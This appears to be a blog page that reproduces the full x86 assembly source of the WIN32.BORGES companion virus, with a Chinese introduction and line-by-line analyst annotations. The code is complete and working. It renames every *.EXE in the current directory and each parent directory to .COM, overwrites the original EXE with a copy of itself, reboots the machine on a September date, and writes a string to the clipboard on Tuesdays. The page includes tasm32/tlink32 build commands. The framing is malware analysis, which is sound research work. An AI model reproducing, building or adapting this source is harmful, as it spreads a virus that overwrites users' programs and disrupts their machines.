Win32.borges.asm

博客介绍了WIN32.BORGES病毒(Int13h/IKX 编写的 Win32 伴随型病毒)的源代码:它把当前目录及各级上层目录中的 *.EXE 重命名为 .COM,再用自身副本覆盖原 EXE(即所谓“镜像”/伴随感染);文件头注释称 9 月 19 日重启机器,但代码实际比较的日期是 17 日;周二把标题字符串放入剪贴板;全部操作都通过 Win32 API 完成。文中还给出了病毒代码的编译方法,包含 tasm32 和 tlink32 命令,代码中调用多个 API 函数实现病毒功能。本文内容仅供恶意代码分析与检测研究,请勿编译运行。
; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
; It mirrores EXEs files, navegates directories with the famous dot-dot;
; method, on september 19 reboots the machine; on tuesdays puts a text;
; in the clipboard. This beast works using API for all its operations,;
; no dirty tricks are used. Just to mantain compatibility :);
; Dedicated to Jorge Luis Borges, because the first tale of his book;
; named "The book of sand" is called "The other", and it speaks about;
; an encounter with a younger copy of himself. The famous doppelganger.;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;

.386
.model flat
locals

extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC

.DATA

; Analyst annotations only (historical malware source kept byte-identical).
; Several buffers are deliberately laid out back-to-back so that API structures
; written into one of them overlap the next (see Win32FindData / Hallado).
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0   ; MessageBox caption; also the text placed on the clipboard on Tuesdays
TextoVentana db 'Made in Paraguay, South America',0     ; MessageBox body; (TextoVentana - TituloVentana) = 33 is used as the GlobalAlloc size (title + NUL)
MemHandle dd 0                                          ; HGLOBAL from GlobalAlloc holding the clipboard text
Victimas db '*.EXE',0                                   ; FindFirstFileA pattern: every *.EXE in the current directory
SearcHandle dd 0                                        ; search handle from FindFirstFileA; FindClose is never imported or called, so one handle leaks per directory
Longitud dd 0                                           ; length returned by GetCurrentDirectoryA; the '..' walk stops when this stops changing
ProcessInfo dd 4 dup (0)                                ; PROCESS_INFORMATION (16 bytes) filled by CreateProcessA; its handles are never closed
StartupInfo dd 4 dup (0)                                ; NOTE(review): only 16 bytes and cb stays 0; STARTUPINFOA is 68 bytes, so CreateProcessA reads past this into Win32FindData - confirm against the SDK layout
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0                  ; 44 bytes. NOTE(review): that is exactly the size of WIN32_FIND_DATAA up to cFileName, so the found file name is written straight into Hallado below
Hallado db 200 dup (0)                                  ; overlay of WIN32_FIND_DATAA.cFileName (the victim name); NOTE(review): cFileName is 260 bytes, so FindFirstFileA/FindNextFileA also write into the start of Crear - harmless because Crear is rebuilt by lstrcpyA before use
Crear db 200 dup (0)                                    ; victim name with its extension replaced by "COM" - the MoveFileA target
ParaCorrer db 200 dup (0)                               ; copy of our own command line, truncated right after the extension; always used from offset +1, i.e. the code assumes the command line starts with a '"'
Original db 200 dup (0)                                 ; directory at start-up, restored at Salida before the companion is launched
Actual db 200 dup (0)                                   ; current directory after each SetCurrentDirectoryA('..')
PuntoPunto db '..',0                                    ; parent-directory path used for the upward walk
SystemTimeStruc dw 0,0,0,0,0,0,0,0                      ; SYSTEMTIME (16 bytes): wYear,wMonth,wDayOfWeek,wDay,... ; +2, +4 and +6 are read below


.CODE

; Entry point. Flat code with shared jump targets rather than PROCs:
;   BORGES -> [Adios] -> NoFQVbirthday -> Carrousell (InfectDirectory per level) -> Salida -> [FillClipboard] -> Run4theNight -> Done
; Register contract: esi is set once at ElPunto (extension of our own path inside ParaCorrer) and
; read at Done; edi is scratch. All calls are stdcall (callee pops), so no stack clean-up appears here.
BORGES: mov eax,offset SystemTimeStruc
push eax
call GetSystemTime                          ; fill SystemTimeStruc with the local date/time

mov ax,word ptr offset [SystemTimeStruc+2]  ; intended: wMonth. NOTE(review): 'word ptr offset [...]' may assemble as the low word of the ADDRESS rather than the field - confirm in a debugger
cmp al,9                                    ; September?
jne NoFQVbirthday

mov ax,word ptr offset [SystemTimeStruc+6]  ; intended: wDay (same 'offset' caveat)
cmp al,17                                   ; the 17th - the file header says the 19th; the code compares against 17
je Adios                                    ; date payload: message box, then reboot

NoFQVbirthday:
push offset Original
push 000000C8h                              ; 200 = sizeof(Original)
call GetCurrentDirectoryA                   ; remember the start directory
mov dword ptr [Longitud],eax                ; its length is the baseline for the '..' loop

call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA                               ; ParaCorrer = own command line; lstrcpyA returns ParaCorrer in eax

mov edi,eax
Buscar: cmp byte ptr [edi],'.'              ; first '.' is taken to be the start of our own extension
jz ElPunto                                  ; NOTE(review): unbounded scan - a command line with no '.' runs past the 200-byte buffer
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi                                     ; esi -> the 3 extension chars ("EXE"); rewritten to "COM" at Done
add edi,4
mov byte ptr [edi],00                       ; truncate after ".xxx" so ParaCorrer+1 is just the path (assumes a leading '"' and a 3-char extension)

Carrousell:
call InfectDirectory                        ; infect every *.EXE in the current directory
push offset PuntoPunto
call SetCurrentDirectoryA                   ; cd ..
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]                ; length unchanged => '..' did nothing => root reached
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell

; Companion ("mirror") infection of the current directory: victim.EXE is renamed to victim.COM and
; a copy of this executable is written as victim.EXE. Returns via ret when FindNextFileA reports no
; more files, but on a FindFirstFileA failure (e.g. a directory with no *.EXE) it jumps straight to
; Salida, abandoning the upward walk and leaving the return address from Carrousell on the stack.
InfectDirectory:
push offset Win32FindData
push offset Victimas
call FindFirstFileA                         ; cFileName lands in Hallado via the .DATA overlay
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1                           ; INVALID_HANDLE_VALUE from FindFirstFileA (FindNextFileA returns a BOOL, so this is moot on later iterations)
je Salida
or eax,eax                                  ; FindNextFileA returned FALSE => no more files here
jnz Continuar
ret                                         ; SearcHandle is never closed

Continuar:
push offset Hallado
push offset Crear
call lstrcpyA                               ; Crear = found name

mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'                      ; locate the extension (unbounded; relies on the '*.EXE' match containing a '.')
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h              ; little-endian "COM",0: replaces "EXE" and terminates the name

push offset Crear
push offset Hallado
call MoveFileA                              ; rename victim.EXE -> victim.COM; return value ignored

push 0                                      ; bFailIfExists = FALSE (overwrite)
push offset Hallado
push offset ParaCorrer+1
call CopyFileA                              ; copy ourselves over victim.EXE; return value ignored, so even if MoveFileA failed (victim.COM already present) the EXE is overwritten

push offset Win32FindData
push dword ptr [SearcHandle]
call FindNextFileA
jmp Ciclo

; Tuesday payload: puts the caption string on the clipboard as CF_TEXT, then continues at Run4theNight.
FillClipboard:
push 0
call OpenClipboard                          ; no owner window; return value ignored
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)   ; byte count = length of TituloVentana including its NUL (33)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax                                    ; hMem argument for GlobalLock
mov dword ptr [MemHandle],eax
call GlobalLock
push eax                                    ; NOTE(review): this is the locked POINTER and is later passed to GlobalUnlock, which takes the HGLOBAL (MemHandle)
push offset TituloVentana
push eax
call lstrcpyA                               ; copy the caption (not TextoVentana) into the block
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData                       ; clipboard takes ownership of MemHandle
call CloseClipboard
jmp Run4theNight

; Date payload: message box, then reboot. Entered straight from BORGES, so nothing in NoFQVbirthday
; ran: Original and ParaCorrer are still empty and esi is uninitialised, yet execution falls through
; into Salida/Run4theNight if ExitWindowsEx returns (refused or failed) - see the write at Done.
Adios: push 00000001                        ; MB_OKCANCEL
push offset TituloVentana
push offset TextoVentana
push 0                                      ; hWnd = NULL
call MessageBoxA

push 0                                      ; dwReserved
push 00000002 ; EWX_REBOOT
call ExitWindowsEx                          ; return value ignored; falls through to Salida


Salida: push offset Original
call SetCurrentDirectoryA                   ; back to the start directory so the companion runs where we were launched

mov ax,word ptr offset [SystemTimeStruc+4]  ; intended: wDayOfWeek (0 = Sunday); same 'offset' caveat as above
cmp al,2                                    ; Tuesday
je FillClipboard

; Launch the companion (our own path with a .COM extension = the renamed original host) and exit.
Run4theNight:
push offset ProcessInfo                     ; lpProcessInformation
push offset StartupInfo                     ; lpStartupInfo (cb = 0 and undersized, see .DATA)
sub eax,eax
push eax                                    ; lpCurrentDirectory = NULL
push eax                                    ; lpEnvironment = NULL
push 00000010h                              ; dwCreationFlags = CREATE_NEW_CONSOLE
push eax                                    ; bInheritHandles = FALSE
push eax                                    ; lpThreadAttributes = NULL
push eax                                    ; lpProcessAttributes = NULL
call GetCommandLineA
inc eax                                     ; skip the leading '"' (the closing one stays in the string)
push eax                                    ; lpCommandLine = original command line minus its first character

Done: mov dword ptr [esi],0004d4f43h        ; ParaCorrer: ".EXE" -> ".COM" (esi set at ElPunto; never initialised on the Adios path)
push offset ParaCorrer+1                    ; lpApplicationName = our own path with the .COM extension
call CreateProcessA                         ; return value unchecked; ProcessInfo handles never closed
push 0
call ExitProcess

Ends
End BORGES




